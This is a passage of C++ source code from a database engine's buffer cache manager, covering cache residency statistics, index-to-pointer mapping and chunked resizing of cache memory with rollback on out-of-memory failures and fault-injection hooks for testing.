ERR ErrBFICacheUpdateStatistics()
{
ERR err = JET_errSuccess;
DWORD cUpdate = 0;
IBitmapAPI* pbmapi = NULL;
size_t cmmpgResident = 0;
size_t cmmpgNonResident = 0;
size_t cmmpgNewNonResident = 0;
LONG ibfMax = 0;
LONG ibfLastTrimmed = -1;
LONG cbfCacheAddressableAfter = -1;
LONG cbfInitAfter = -1;
LONG cbfNewlyCommittedAfter = -1;
const TICK tickStartUpdateStats = TickOSTimeCurrent();
Unused( tickStartUpdateStats );
// memory over-commit protection.
const __int64 cbTotalPhysicalMemory = (__int64)OSMemoryQuotaTotal();
const __int64 cbCommittedCacheSize = CbBFICacheIMemoryCommitted();
const __int64 cbCommitCacheTarget = g_cacheram.GetOptimalResourcePoolSize();
const TICK dtickCacheSizeDuration = DtickBFIMaintCacheSizeDuration();
// do not enforce over-memory protection if the committed cache size is within acceptable range compared to target.
if ( FBFICommittedCacheSizeOverTargetDefense( cbCommittedCacheSize, cbCommitCacheTarget ) )
{
EnforceSz( !FBFITriggerCacheOverMemoryInDepthProtection( cbTotalPhysicalMemory, cbCommittedCacheSize ), "CacheWayOverPhysMem" );
}
#ifndef ESENT
// ESENT clients are more diverse w.r.t. cache sizes and buffer cache usage, so
// disable over-target protection in this case.
if ( FBFITriggerCacheOverTargetInDepthProtection( cbCommittedCacheSize, cbCommitCacheTarget, dtickCacheSizeDuration ) )
{
FireWall( "CacheOverTargetTooLong" );
AssertSz( fFalse, "Defense-in-depth protection for committed cache (%I64d) vs. target size (%I64d).", cbCommittedCacheSize, cbCommitCacheTarget );
}
#endif // !ESENT
// reset residency statistics.
g_qwUnintendedResidentPagesLastPass = 0;
g_cbfUnintendedResidentPagesLastPass = 0;
g_cbfHighUnintendedResidentPagesLastPass = 0;
// Note: we account for newly committed buffers separately, because these pages are a part of the cache size, but are not resident ...
const LONG cbfCacheAddressableBefore = (LONG)cbfCacheAddressable;
const LONG cbfNewlyCommittedBefore = (LONG)g_cbfNewlyCommitted;
const LONG cbfInitBefore = *(volatile LONG *)(&cbfInit);
OnDebug( CStats * phistoIcbBuffer = new CPerfectHistogramStats() );
// compute the max cache size we'll need for small caches
const size_t cbVMPage = OSMemoryPageCommitGranularity();
const size_t cbfVMPage = max( 1, cbVMPage / g_rgcbPageSize[g_icbCacheMax] );
const size_t cmmpgBF = max( 1, g_rgcbPageSize[g_icbCacheMax] / cbVMPage );
const LONG_PTR cpgMax = min( cbfInitBefore, g_cpgChunk );
// get our page residence data from the system
size_t cbMax = roundup( cpgMax * g_rgcbPageSize[g_icbCacheMax], OSMemoryPageCommitGranularity() ); // for 2KB pages
Call( ErrOSMemoryPageResidenceMapScanStart( cbMax, &cUpdate ) );
// there has been a change in the page residence data
if ( cUpdate != g_cResidenceCalc )
{
// note this change in our residence data
g_cResidenceCalc = cUpdate;
// compute the parameters required to walk the cache by VM page
size_t cbitVMPage;
for ( cbitVMPage = 0; (size_t)1 << cbitVMPage != cbVMPage; cbitVMPage++ );
Expected( cbitVMPage == 12 || cbitVMPage == 13 ); // 4KB (x86/amd64) or 8KB (ia64)
IBF ibfLastUnintendedResident = 0;
// walk every VM page in the cache by each chunk
for ( size_t iCacheChunk = 0, ibf = 0; ibf < (size_t)cbfInitBefore && iCacheChunk < cCacheChunkMax; iCacheChunk++ )
{
// get our page residence data for this chunk from the system
Assert( cpgMax == g_cpgChunk || iCacheChunk == 0 ); // only a small / one-chunk cache should have a cpgMax less than g_cpgChunk
cbMax = roundup( cpgMax * g_rgcbPageSize[g_icbCacheMax], OSMemoryPageCommitGranularity() ); // for 2KB pages
Call( ErrOSMemoryPageResidenceMapRetrieve( g_rgpvChunk[ iCacheChunk ], cbMax, &pbmapi ) );
// Note: Processing the last chunk retrieves more than necessary, but since it's all
// reserved and we check ibf < cbfInitBefore, it's technically OK, just a little
// inefficient.
size_t immpgBF = 0;
for ( size_t iVMPage = 0; ibf < (size_t)cbfInitBefore && iVMPage < ( cbMax / OSMemoryPageCommitGranularity() ); iVMPage++ )
{
BOOL fResident = fTrue;
IBitmapAPI::ERR errBM = IBitmapAPI::ERR::errSuccess;
// determine if this VM page is resident. when in doubt, claim
// that it is resident
errBM = pbmapi->ErrGet( iVMPage, &fResident );
if ( errBM != IBitmapAPI::ERR::errSuccess )
{
fResident = fTrue;
}
// this VM page is not resident
if ( !fResident )
{
cmmpgNonResident++;
// mark every resident BF that uses this VM page as not
// resident
for ( IBF ibfT = ibf; ibfT < cbfInitBefore && ibfT < IBF( ibf + cbfVMPage ); ibfT++ )
{
const PBF pbf = PbfBFICacheIbf( ibfT );
if ( cmmpgBF >= 2 )
{
Assert( ibfT == (LONG_PTR)ibf ); // should be only one ibf
// since this buffer can have multiple VM pages, and the buffer may not be the full size, we
// can not count a non-resident page past the end of the buffer against such a buffer.
if ( ( cbVMPage * ( immpgBF + 1 ) ) <= (size_t)g_rgcbPageSize[pbf->icbBuffer] )
{
// this looks like it is decrementing per VM page, but it is not, b/c the first
// VM page to trigger this code path will set the bfrs to bfrsNotResident, and then
// we will short-circuit this code and not decrement g_cbfCacheResident thereafter.
(void)BfrsBFIUpdateResidentState( pbf, bfrsNotResident, bfrsResident );
}
}
else
{
if ( bfrsResident == BfrsBFIUpdateResidentState( pbf, bfrsNotResident, bfrsResident ) )
{
cmmpgNewNonResident++;
}
}
}
// update statistics / perf counters
if ( (IBF)ibf != ibfLastTrimmed )
{
// not really safe to use PinstFromIfmp( pbf->ifmp ), pbf->tce, so we'll make this a
// global counter.
PERFOpt( AtomicIncrement( (LONG*)&g_cbfTrimmed ) );
}
ibfLastTrimmed = ibf;
}
else
{
cmmpgResident++;
#ifndef RTM
// this actually may be quite expensive fetching all these random BFs
if ( cmmpgBF >= 2 )
{
const PBF pbf = PbfBFICacheIbf( ibf );
const ICBPage icbBuffer = (ICBPage)pbf->icbBuffer;
#ifdef DEBUG
if ( phistoIcbBuffer )
{
phistoIcbBuffer->ErrAddSample( (SAMPLE) icbBuffer );
}
#endif
if ( ( cbVMPage * ( immpgBF + 1 ) ) > (size_t)g_rgcbPageSize[icbBuffer] )
{
// Unfortunately, due to the lack of locking and the timing / overlap of page dehydration, this
// can hit, but we would not expect it to hit very often.
// We cannot count all pages, because shrink is very aggressive and when pages are dirty they will
// be rehydrated, and then dehydrated in quick succession to satisfy shrink. In such an environment
// we can blow past our quota (below) of 10k unintentionally resident pages. So we now exclude
// unintentionally resident pages if they're over the cache size, as this should be a temporary
// condition, and once shrink completes it de-commits or resets all pages over the cache size.
if ( ibf > (size_t)cbfCacheAddressable )
{
g_cbfHighUnintendedResidentPagesLastPass++;
}
else
{
g_qwUnintendedResidentPagesLastPass++;
g_qwUnintendedResidentPagesEver++;
if ( (IBF)ibf != ibfLastUnintendedResident )
{
g_cbfUnintendedResidentPagesLastPass++;
ibfLastUnintendedResident = (IBF)ibf;
}
}
}
}
#endif
} // if !resident / else resident ...
// advance our current BF pointer as we walk VM pages
if ( ++immpgBF >= cmmpgBF )
{
immpgBF = 0;
ibf += cbfVMPage;
ibfMax = ibf;
}
}
} // for each cache chunk
} // update id is diff from current update id
g_tickLastUpdateStatistics = TickOSTimeCurrent();
// used for tracing only.
cbfCacheAddressableAfter = (LONG)cbfCacheAddressable;
cbfNewlyCommittedAfter = (LONG)g_cbfNewlyCommitted;
cbfInitAfter = (LONG)cbfInit;
HandleError:
OSMemoryPageResidenceMapScanStop();
const TICK tickFinishUpdateStats = TickOSTimeCurrent();
Unused( tickFinishUpdateStats );
// We think it would be hard to dehydrate 10k buffers in the time it takes for us to process the residence map.
Assert( g_qwUnintendedResidentPagesLastPass < 10000 );
OSTrace( JET_tracetagBufferManagerMaintTasks, OSFormat( "ErrBFICacheUpdateStatistics() -> %d completed in %d ms, g_qwUnintendedResidentPagesLastPass = %d, b: %d, %d, %d, a: %d, %d, %d ... res-stats: %d, %d, %d ... %d",
err,
DtickDelta( tickStartUpdateStats, g_tickLastUpdateStatistics ),
(ULONG)g_qwUnintendedResidentPagesLastPass,
cbfCacheAddressableBefore, cbfNewlyCommittedBefore, cbfInitBefore,
cbfCacheAddressableAfter, cbfNewlyCommittedAfter, cbfInitAfter,
(ULONG)cmmpgResident, (ULONG)cmmpgNonResident, (ULONG)cmmpgNewNonResident,
ibfMax ) );
BFIReportCacheStatisticsChanges(
&g_statsBFCacheResidency,
UtilGetCurrentFileTime(),
(INT)g_cbfCacheResident,
(INT)CbfBFICacheCommitted(),
cbCommittedCacheSize,
cbCommitCacheTarget,
cbTotalPhysicalMemory );
OnDebug( delete phistoIcbBuffer );
return err;
}
// returns the cache clean percentage
LONG LBFICacheCleanPercentage( void )
{
return ( LONG )( 100 * g_cbfCacheClean / max( 1, cbfCacheSize ) );
}
// returns the cache size percentage of maximum allowed size
LONG LBFICacheSizePercentage( void )
{
return ( LONG )( 100 * cbfCacheSize / max( 1, cbfCacheTarget ) );
}
// returns the cache pinned buffer percentage
LONG LBFICachePinnedPercentage( void )
{
BFSTAT bfStat = BFLogHistogram::Read();
Assert( bfStat.m_cBFPin <= bfStat.m_cBFMod );
return ( LONG )( 100 * bfStat.m_cBFPin / max( 1, cbfCacheSize ) );
}
// Returns the current buffer size backing the given latched page.
// NOTE: buffer size may be dehydrated and thus different than CbBFPageSize().
INLINE LONG CbBFIBufferSize( const PBF pbf )
{
Assert( pbf->sxwl.FLatched() );
return g_rgcbPageSize[pbf->icbBuffer];
}
// Returns the page size of the given latched page.
INLINE LONG CbBFIPageSize( const PBF pbf )
{
Assert( pbf->sxwl.FLatched() );
return g_rgcbPageSize[pbf->icbPage];
}
#ifdef DEBUG
// returns fTrue if the specified page pointer is valid
INLINE BOOL FBFICacheValidPv( const void* const pv )
{
if ( BoolParam( JET_paramEnableViewCache ) )
{
return pv != NULL;
}
else
{
return IpgBFICachePv( pv ) != ipgNil;
}
}
// returns fTrue if the specified BF pointer is valid
INLINE BOOL FBFICacheValidPbf( const PBF pbf )
{
return IbfBFICachePbf( pbf ) != ibfNil;
}
#endif // DEBUG
// returns the PBF associated with the given IBF
INLINE PBF PbfBFICacheIbf( const IBF ibf )
{
return ( ibf == ibfNil ?
pbfNil :
g_rgpbfChunk[ ibf / g_cbfChunk ] + ibf % g_cbfChunk );
}
// returns the page pointer associated with the given IPG
INLINE void* PvBFICacheIpg( const IPG ipg )
{
if ( BoolParam( JET_paramEnableViewCache ) )
{
// Ergh, this went off in an ESE _internal_ unit test, so it is disabled for now
//ExpectedSz( fFalse, "This wouldn't return a valid answer in ViewCache, and I don't think it is used there." );
// though I don't understand why we can't index off the rgbf and get it that way...
return NULL;
}
else
{
// We use g_icbCacheMax because we need to be able to handle a maximum size page
return ( ipg == ipgNil ?
NULL :
(BYTE*)g_rgpvChunk[ ipg / g_cpgChunk ] + ( ipg % g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax] );
}
}
// returns the IBF associated with the given PBF
IBF IbfBFICachePbf( const PBF pbf )
{
// scan the PBF chunk table looking for a chunk that fits in this range
LONG_PTR ibfChunk;
for ( ibfChunk = 0; ibfChunk < cCacheChunkMax; ibfChunk++ )
{
// our PBF is part of this chunk and is aligned properly
if ( g_rgpbfChunk[ ibfChunk ] &&
g_rgpbfChunk[ ibfChunk ] <= pbf && pbf < g_rgpbfChunk[ ibfChunk ] + g_cbfChunk &&
( DWORD_PTR( pbf ) - DWORD_PTR( g_rgpbfChunk[ ibfChunk ] ) ) % sizeof( BF ) == 0 )
{
// compute the IBF for this PBF
const IBF ibf = ibfChunk * g_cbfChunk + pbf - g_rgpbfChunk[ ibfChunk ];
Assert( PbfBFICacheIbf( ibf ) == pbf );
return ibf;
}
}
// our PBF isn't part of any chunk so return nil
return ibfNil;
}
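// Illustrative example (hypothetical values): with a chunk base of 0x10000000 and
// sizeof( BF ) == 256, a pbf of 0x10000100 passes the range and alignment tests and maps
// to ibf == ibfChunk * g_cbfChunk + 1, whereas a misaligned pointer such as 0x10000180
// fails the modulo test and the scan ultimately returns ibfNil.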
// returns the IPG associated with the given page pointer
IPG IpgBFICachePv( const void* const pv )
{
// this may possibly not work b/c of the different mapping methods ... to be perfectly safe
// we would need to check that rgbf[ipg].bfat == bfatFracCommit before returning.
Expected( !UlParam( JET_paramEnableViewCache ) );
// scan the page chunk table looking for a chunk that fits in this range
LONG_PTR ipgChunk;
for ( ipgChunk = 0; ipgChunk < cCacheChunkMax; ipgChunk++ )
{
// our page pointer is part of this chunk and is aligned properly
if ( g_rgpvChunk[ ipgChunk ] &&
g_rgpvChunk[ ipgChunk ] <= pv &&
pv < (BYTE*)g_rgpvChunk[ ipgChunk ] + g_cpgChunk * g_rgcbPageSize[g_icbCacheMax] &&
( DWORD_PTR( pv ) - DWORD_PTR( g_rgpvChunk[ ipgChunk ] ) ) % g_rgcbPageSize[g_icbCacheMax] == 0 )
{
// compute the IPG for this page pointer
const IPG ipg = ipgChunk * g_cpgChunk + ( (BYTE*)pv - (BYTE*)g_rgpvChunk[ ipgChunk ] ) / g_rgcbPageSize[g_icbCacheMax];
Assert( PvBFICacheIpg( ipg ) == pv );
return ipg;
}
}
// our page pointer isn't part of any chunk so return nil
return ipgNil;
}
// returns whether the alloc type is consistent with the set pv pointer
BOOL FBFIValidPvAllocType( const BF * const pbf )
{
return ( pbf->bfat == bfatNone && pbf->pv == NULL ) ||
( pbf->bfat != bfatNone && pbf->pv != NULL );
}
// designed to operate in place of "operation" type functions like FOSMemoryPageCommit(), where
// true is success and false is failure. You can still set an error in the fault injection field
// and it will return false here.
#define FOpFI( ulID ) ( ( ErrFaultInjection( ulID ) < JET_errSuccess ) ? fFalse : fTrue )
#define AllocFI( ulID, func ) \
{ \
if ( ErrFaultInjection( ulID ) < JET_errSuccess ) \
{ \
Alloc( NULL ); \
} \
else \
{ \
Alloc( func ); \
} \
}
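// Illustrative usage sketch (the fault-injection IDs and locals below are hypothetical):
//
//      if ( !FOpFI( 12345 ) || !FOSMemoryPageCommit( pvStart, cb ) )
//      {
//          Call( ErrERRCheck( JET_errOutOfMemory ) );
//      }
//      AllocFI( 12346, pv = PvOSMemoryPageReserve( cb, NULL ) );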
ERR ErrBFICacheISetDataSize( const LONG_PTR cpgCacheStart, const LONG_PTR cpgCacheNew )
{
ERR err = JET_errSuccess;
Assert( g_critCacheSizeResize.FOwner() );
// if we are mapping views then do not allocate data blocks
if ( BoolParam( JET_paramEnableViewCache ) )
{
return JET_errSuccess;
}
// set the current cache size as the starting cache size. this is the
// effective cache size for purposes of recovering on an OOM
LONG_PTR cpgCacheCur = cpgCacheStart;
// convert the current and new cache sizes into chunks
//
// NOTE: this function relies on the fact that if either cpgCacheStart or
// cpgCacheNew are 0, then ipgChunkStart or ipgChunkNew will become -1.
// do not change their types to unsigned!!!
const LONG_PTR ipgChunkStart = cpgCacheStart ? ( cpgCacheStart - 1 ) / g_cpgChunk : -1;
const LONG_PTR ipgChunkNew = cpgCacheNew ? ( cpgCacheNew - 1 ) / g_cpgChunk : -1;
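// Illustrative example (hypothetical chunk size): with g_cpgChunk == 1024, cpgCacheStart == 0
// yields ipgChunkStart == -1 (no chunks), 1024 yields ( 1024 - 1 ) / 1024 == 0 (exactly one
// full chunk), and 1025 yields 1 (a second, partially used chunk).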
// the cache size has grown
if ( ipgChunkNew > ipgChunkStart )
{
// this is not the first allocation or an aligned allocation
if ( cpgCacheStart % g_cpgChunk )
{
// make sure that all the memory in the chunk at the end of the cache
// is committed
const size_t ib = ( cpgCacheStart % g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax];
const size_t cb = ( ( ipgChunkStart + 1 ) * g_cpgChunk - cpgCacheStart ) * g_rgcbPageSize[g_icbCacheMax];
void* const pvStart = (BYTE*)g_rgpvChunk[ ipgChunkStart ] + ib;
if ( !FOpFI( 33032 ) || !FOSMemoryPageCommit( pvStart, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// allocate cache chunks for the new range
for ( LONG_PTR ipgChunkAlloc = ipgChunkStart + 1; ipgChunkAlloc <= ipgChunkNew; ipgChunkAlloc++ )
{
// reserve a new cache chunk
const size_t cbChunkAlloc = g_cpgChunk * g_rgcbPageSize[g_icbCacheMax];
AllocFI( 49416, g_rgpvChunk[ ipgChunkAlloc ] = PvOSMemoryPageReserve( cbChunkAlloc, NULL ) );
g_cbCacheReservedSize += (ULONG_PTR)cbChunkAlloc; // atomic not required here
Assert( (LONG_PTR)g_cbCacheReservedSize >= (LONG_PTR)cbChunkAlloc );
// update the cache size to reflect the new cache chunk
//
// NOTE: we do this to make OOM recovery easier
cpgCacheCur = min( cpgCacheNew, ( ipgChunkAlloc + 1 ) * g_cpgChunk );
// commit only the memory which will be in use
const size_t ib = 0;
const size_t cb = min( g_cpgChunk, cpgCacheNew - ipgChunkAlloc * g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax];
void* const pvStart = (BYTE*)g_rgpvChunk[ ipgChunkAlloc ] + ib;
if ( !FOpFI( 48904 ) || !FOSMemoryPageCommit( pvStart, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
}
// the cache size has shrunk
else if ( ipgChunkNew < ipgChunkStart )
{
// free cache chunks for the new range
for ( LONG_PTR ipgChunkFree = ipgChunkNew + 1; ipgChunkFree <= ipgChunkStart; ipgChunkFree++ )
{
void* const pvChunkFree = g_rgpvChunk[ ipgChunkFree ];
g_rgpvChunk[ ipgChunkFree ] = NULL;
const size_t cbChunkFree = g_cpgChunk * g_rgcbPageSize[g_icbCacheMax];
OSMemoryPageDecommit( pvChunkFree, cbChunkFree );
OSMemoryPageFree( pvChunkFree );
g_cbCacheReservedSize -= (ULONG_PTR)cbChunkFree; // atomic not required here
Assert( (LONG_PTR)g_cbCacheReservedSize >= 0 );
}
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cpgPerPage = max( 1, OSMemoryPageCommitGranularity() / g_rgcbPageSize[g_icbCacheMax] );
Expected( cpgPerPage == 1 ); // 2KB pages and Itanium are dead.
LONG_PTR cpgCommit = cpgCacheNew - ipgChunkNew * g_cpgChunk + cpgPerPage - 1;
cpgCommit -= cpgCommit % cpgPerPage;
LONG_PTR cpgCommitMax = g_cpgChunk + cpgPerPage - 1;
cpgCommitMax -= cpgCommitMax % cpgPerPage;
const LONG_PTR cpgReset = cpgCommitMax - cpgCommit;
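// Illustrative example (hypothetical sizes): with g_cpgChunk == 1024, cpgPerPage == 1 and
// 300 pages of the last chunk still in use, cpgCommit == 300, cpgCommitMax == 1024 and
// cpgReset == 724, i.e. the unused tail of the chunk is handed back via OSMemoryPageReset.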
if ( cpgReset )
{
OSMemoryPageReset( (BYTE*)g_rgpvChunk[ ipgChunkNew ] + cpgCommit * g_rgcbPageSize[g_icbCacheMax],
cpgReset * g_rgcbPageSize[g_icbCacheMax],
fTrue );
}
}
// the cache size has stayed the same (at least chunk-wise)
else
{
// the cache size has grown but less than one chunk
if ( cpgCacheNew > cpgCacheStart )
{
// commit only the memory which will be in use
const size_t ib = ( cpgCacheStart % g_cpgChunk ) * g_rgcbPageSize[g_icbCacheMax];
const size_t cb = ( cpgCacheNew - cpgCacheStart ) * g_rgcbPageSize[g_icbCacheMax];
void* const pvStart = (BYTE*)g_rgpvChunk[ ipgChunkStart ] + ib;
if ( !FOpFI( 65288 ) || !FOSMemoryPageCommit( pvStart, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// the cache size has shrunk but less than one chunk
else if ( cpgCacheNew < cpgCacheStart )
{
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cpgPerPage = max( 1, OSMemoryPageCommitGranularity() / g_rgcbPageSize[g_icbCacheMax] );
LONG_PTR cpgCommit = cpgCacheNew - ipgChunkNew * g_cpgChunk + cpgPerPage - 1;
cpgCommit -= cpgCommit % cpgPerPage;
LONG_PTR cpgCommitMax = g_cpgChunk + cpgPerPage - 1;
cpgCommitMax -= cpgCommitMax % cpgPerPage;
const LONG_PTR cpgReset = cpgCommitMax - cpgCommit;
const size_t ib = cpgCommit * g_rgcbPageSize[g_icbCacheMax];
const size_t cb = cpgReset * g_rgcbPageSize[g_icbCacheMax];
if ( cpgReset )
{
OSMemoryPageReset( (BYTE*)g_rgpvChunk[ ipgChunkNew ] + ib,
cb,
fTrue );
}
}
}
return JET_errSuccess;
// on an error, rollback all changes
HandleError:
Assert( cpgCacheCur >= cpgCacheStart );
CallS( ErrBFICacheISetDataSize( cpgCacheCur, cpgCacheStart ) );
return err;
}
ERR ErrBFICacheISetStatusSize( const LONG_PTR cbfCacheStart, const LONG_PTR cbfCacheNew )
{
ERR err = JET_errSuccess;
Assert( g_critCacheSizeResize.FOwner() );
// set the current cache size as the starting cache size. this is the
// effective cache size for purposes of recovering on an OOM
LONG_PTR cbfCacheCur = cbfCacheStart;
// convert the current and new cache sizes into chunks
//
// NOTE: this function relies on the fact that if either cbfCacheStart or
// cbfCacheNew are 0, then ibfChunkStart or ibfChunkNew will become -1.
// do not change their types to unsigned!!!
const LONG_PTR ibfChunkStart = cbfCacheStart ? ( cbfCacheStart - 1 ) / g_cbfChunk : -1;
const LONG_PTR ibfChunkNew = cbfCacheNew ? ( cbfCacheNew - 1 ) / g_cbfChunk : -1;
// the cache size has grown
if ( ibfChunkNew > ibfChunkStart )
{
// this is not the first allocation or an aligned allocation
if ( cbfCacheStart % g_cbfChunk )
{
// make sure that all the memory in the chunk at the end of the cache
// is committed
const size_t ib = ( cbfCacheStart % g_cbfChunk ) * sizeof( BF );
const size_t cb = ( ( ibfChunkStart + 1 ) * g_cbfChunk - cbfCacheStart ) * sizeof( BF );
if ( !FOpFI( 40712 ) || !FOSMemoryPageCommit( (BYTE*)g_rgpbfChunk[ ibfChunkStart ] + ib, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// allocate cache chunks for the new range
for ( LONG_PTR ibfChunkAlloc = ibfChunkStart + 1; ibfChunkAlloc <= ibfChunkNew; ibfChunkAlloc++ )
{
// reserve a new cache chunk
AllocFI( 57096, g_rgpbfChunk[ ibfChunkAlloc ] = (PBF)PvOSMemoryPageReserve( g_cbfChunk * sizeof( BF ), NULL ) );
// update the cache size to reflect the new cache chunk
//
// NOTE: we do this to make OOM recovery easier
cbfCacheCur = min( cbfCacheNew, ( ibfChunkAlloc + 1 ) * g_cbfChunk );
// commit only the memory which will be in use
const size_t ib = 0;
const size_t cb = min( g_cbfChunk, cbfCacheNew - ibfChunkAlloc * g_cbfChunk ) * sizeof( BF );
if ( !FOpFI( 44808 ) || !FOSMemoryPageCommit( (BYTE*)g_rgpbfChunk[ ibfChunkAlloc ] + ib, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
}
// the cache size has shrunk
else if ( ibfChunkNew < ibfChunkStart )
{
// free cache chunks for the new range
for ( LONG_PTR ibfChunkFree = ibfChunkNew + 1; ibfChunkFree <= ibfChunkStart; ibfChunkFree++ )
{
const PBF pbfChunkFree = g_rgpbfChunk[ ibfChunkFree ];
g_rgpbfChunk[ ibfChunkFree ] = NULL;
OSMemoryPageDecommit( pbfChunkFree, g_cbfChunk * sizeof( BF ) );
OSMemoryPageFree( pbfChunkFree );
}
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cbfPerPage = max( 1, OSMemoryPageCommitGranularity() / sizeof( BF ) );
LONG_PTR cbfCommit = cbfCacheNew - ibfChunkNew * g_cbfChunk + cbfPerPage - 1;
cbfCommit -= cbfCommit % cbfPerPage;
LONG_PTR cbfCommitMax = g_cbfChunk + cbfPerPage - 1;
cbfCommitMax -= cbfCommitMax % cbfPerPage;
const LONG_PTR cbfReset = cbfCommitMax - cbfCommit;
if ( cbfReset )
{
OSMemoryPageReset( g_rgpbfChunk[ ibfChunkNew ] + cbfCommit,
cbfReset * sizeof( BF ),
fTrue );
}
}
// the cache size has stayed the same (at least chunk-wise)
else
{
// the cache size has grown but less than one chunk
if ( cbfCacheNew > cbfCacheStart )
{
// commit only the memory which will be in use
const size_t ib = ( cbfCacheStart % g_cbfChunk ) * sizeof( BF );
const size_t cb = ( cbfCacheNew - cbfCacheStart ) * sizeof( BF );
if ( !FOpFI( 61192 ) || !FOSMemoryPageCommit( (BYTE*)g_rgpbfChunk[ ibfChunkStart ] + ib, cb ) )
{
Call( ErrERRCheck( JET_errOutOfMemory ) );
}
}
// the cache size has shrunk but less than one chunk
else if ( cbfCacheNew < cbfCacheStart )
{
// reset cache that will not be in use, being careful of page granularity
const LONG_PTR cbfPerPage = max( 1, OSMemoryPageCommitGranularity() / sizeof( BF ) );
LONG_PTR cbfCommit = cbfCacheNew - ibfChunkNew * g_cbfChunk + cbfPerPage - 1;
cbfCommit -= cbfCommit % cbfPerPage;
LONG_PTR cbfCommitMax = g_cbfChunk + cbfPerPage - 1;
cbfCommitMax -= cbfCommitMax % cbfPerPage;
const LONG_PTR cbfReset = cbfCommitMax - cbfCommit;
if ( cbfReset )
{
OSMemoryPageReset( g_rgpbfChunk[ ibfChunkNew ] + cbfCommit,
cbfReset * sizeof( BF ),
fTrue );
}
}
}
return JET_errSuccess;
// on an error, rollback all changes
HandleError:
CallS( ErrBFICacheISetStatusSize( cbfCacheCur, cbfCacheStart ) );
return err;
}
// sets the allocated size of the cache, allocating or freeing memory as
// necessary
ERR ErrBFICacheISetSize( const LONG_PTR cbfCacheAddressableNew )
{
ERR err = JET_errSuccess;
Assert( g_critCacheSizeResize.FOwner() );
// save the starting cache size
const LONG_PTR cbfCacheAddressableStart = cbfCacheAddressable;
// check our inputs
if ( cbfCacheAddressableStart < 0 )
{
AssertSz( fFalse, "At some point we had a negative cache size!!!?" );
Error( ErrERRCheck( JET_errInvalidParameter ) );
}
if ( cbfCacheAddressableNew < 0 )
{
AssertSz( fFalse, "Someone is trying to set a negative cache size!!!?" );
Error( ErrERRCheck( JET_errInvalidParameter ) );
}
AssertRTL( cbfCacheAddressableNew != 0 || !g_fBFInitialized /* i.e. during term */ );
// grow / shrink our data storage or rollback on OOM
Call( ErrBFICacheISetDataSize( cbfCacheAddressableStart, cbfCacheAddressableNew ) );
// the cache size has grown
if ( cbfCacheAddressableNew > cbfCacheAddressableStart )
{
#ifdef DEBUG
// if we are growing to an old init'd value, we should find quieced BFs
for ( LONG_PTR ibfInit = cbfCacheAddressableStart; ibfInit < cbfInit; ibfInit++ )
{
PBF pbf = PbfBFICacheIbf( ibfInit );
Assert( pbf->fQuiesced );
}
#endif
// grow our status storage iff we are growing past cbfInit
if ( cbfCacheAddressableNew > cbfInit )
{
// grow our status storage or rollback on OOM
if ( ( err = ErrBFICacheISetStatusSize( cbfInit, cbfCacheAddressableNew ) ) < JET_errSuccess )
{
CallS( ErrBFICacheISetDataSize( cbfCacheAddressableNew, cbfCacheAddressableStart ) );
return err;
}
// init all BFs in the newly allocated range
for ( LONG_PTR ibfInit = cbfInit; ibfInit < cbfCacheAddressableNew; ibfInit++ )
{
PBF pbf = PbfBFICacheIbf( ibfInit );
// use placement new to initialize this BF
new( pbf ) BF;
CSXWLatch::ERR errSXWL = pbf->sxwl.ErrTryAcquireWriteLatch();
Assert( errSXWL == CSXWLatch::ERR::errSuccess );
pbf->sxwl.ReleaseOwnership( bfltWrite );
// mark this BF as initialized
cbfInit = ibfInit + 1;
}
}
// initialize and free all BFs in the added range
for ( LONG_PTR ibfInit = cbfCacheAddressableStart; ibfInit < cbfCacheAddressableNew; ibfInit++ )
{
PBF pbf = PbfBFICacheIbf( ibfInit );
// set this BF's page pointer
pbf->pv = PvBFICacheIpg( ibfInit );
// update buffer state
pbf->fNewlyEvicted = fFalse;
pbf->icbBuffer = g_icbCacheMax;
Assert( icbPageInvalid == pbf->icbPage );
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsNewlyCommitted );
Expected( bfrsOld == bfrsNotCommitted );
// set the allocation type
if ( !UlParam( JET_paramEnableViewCache ) )
{
// Note: ErrBFICacheISetDataSize() bails pre-reserve / commit on JET_paramEnableViewCache ...
pbf->bfat = bfatFracCommit;
Assert( g_icbCacheMax == pbf->icbBuffer );
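// NOTE: in DEBUG builds the OnDebug() prefix turns the statement below into an assignment
// that captures the pre-add committed size ( cbCacheCommittedSizeInitial ) for the Assert
// that follows; in retail builds only the AtomicExchangeAddPointer() call remains.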
OnDebug( const LONG_PTR cbCacheCommittedSizeInitial = (LONG_PTR)) AtomicExchangeAddPointer( (void**)&g_cbCacheCommittedSize, (void*)(ULONG_PTR)g_rgcbPageSize[pbf->icbBuffer] );
Assert( cbCacheCommittedSizeInitial >= 0 );
}
Assert( ( pbf->bfat == bfatFracCommit && pbf->pv != NULL ) ||
( pbf->bfat == bfatNone && pbf->pv == NULL ) );
Assert( FBFIValidPvAllocType( pbf ) );
// free this BF to the avail pool
pbf->sxwl.ClaimOwnership( bfltWrite );
BFIFreePage( pbf, fFalse );
// increase the actual cache size
Assert( cbfCacheAddressable == ibfInit );
const ULONG_PTR cbfCacheAddressableNext = ibfInit + 1;
Enforce( ( cbfCacheAddressableNext > 0 ) || ( cbfCacheAddressableNext == 0 && !g_fBFInitialized ) );
cbfCacheAddressable = cbfCacheAddressableNext;
}
}
// the cache size has shrunk
else if ( cbfCacheAddressableNew < cbfCacheAddressableStart )
{
// terminate all BFs in the removed range
for ( LONG_PTR ibfTerm = cbfCacheAddressableStart - 1; ibfTerm >= cbfCacheAddressableNew; ibfTerm-- )
{
PBF pbf = PbfBFICacheIbf( ibfTerm );
// decrease the actual cache size
Assert( cbfCacheAddressable == ibfTerm + 1 );
Enforce( ( ibfTerm > 0 ) || ( ibfTerm == 0 && !g_fBFInitialized ) );
cbfCacheAddressable = ibfTerm;
// update the buffer state
const BFResidenceState bfrsOld = BfrsBFIUpdateResidentState( pbf, bfrsNotCommitted );
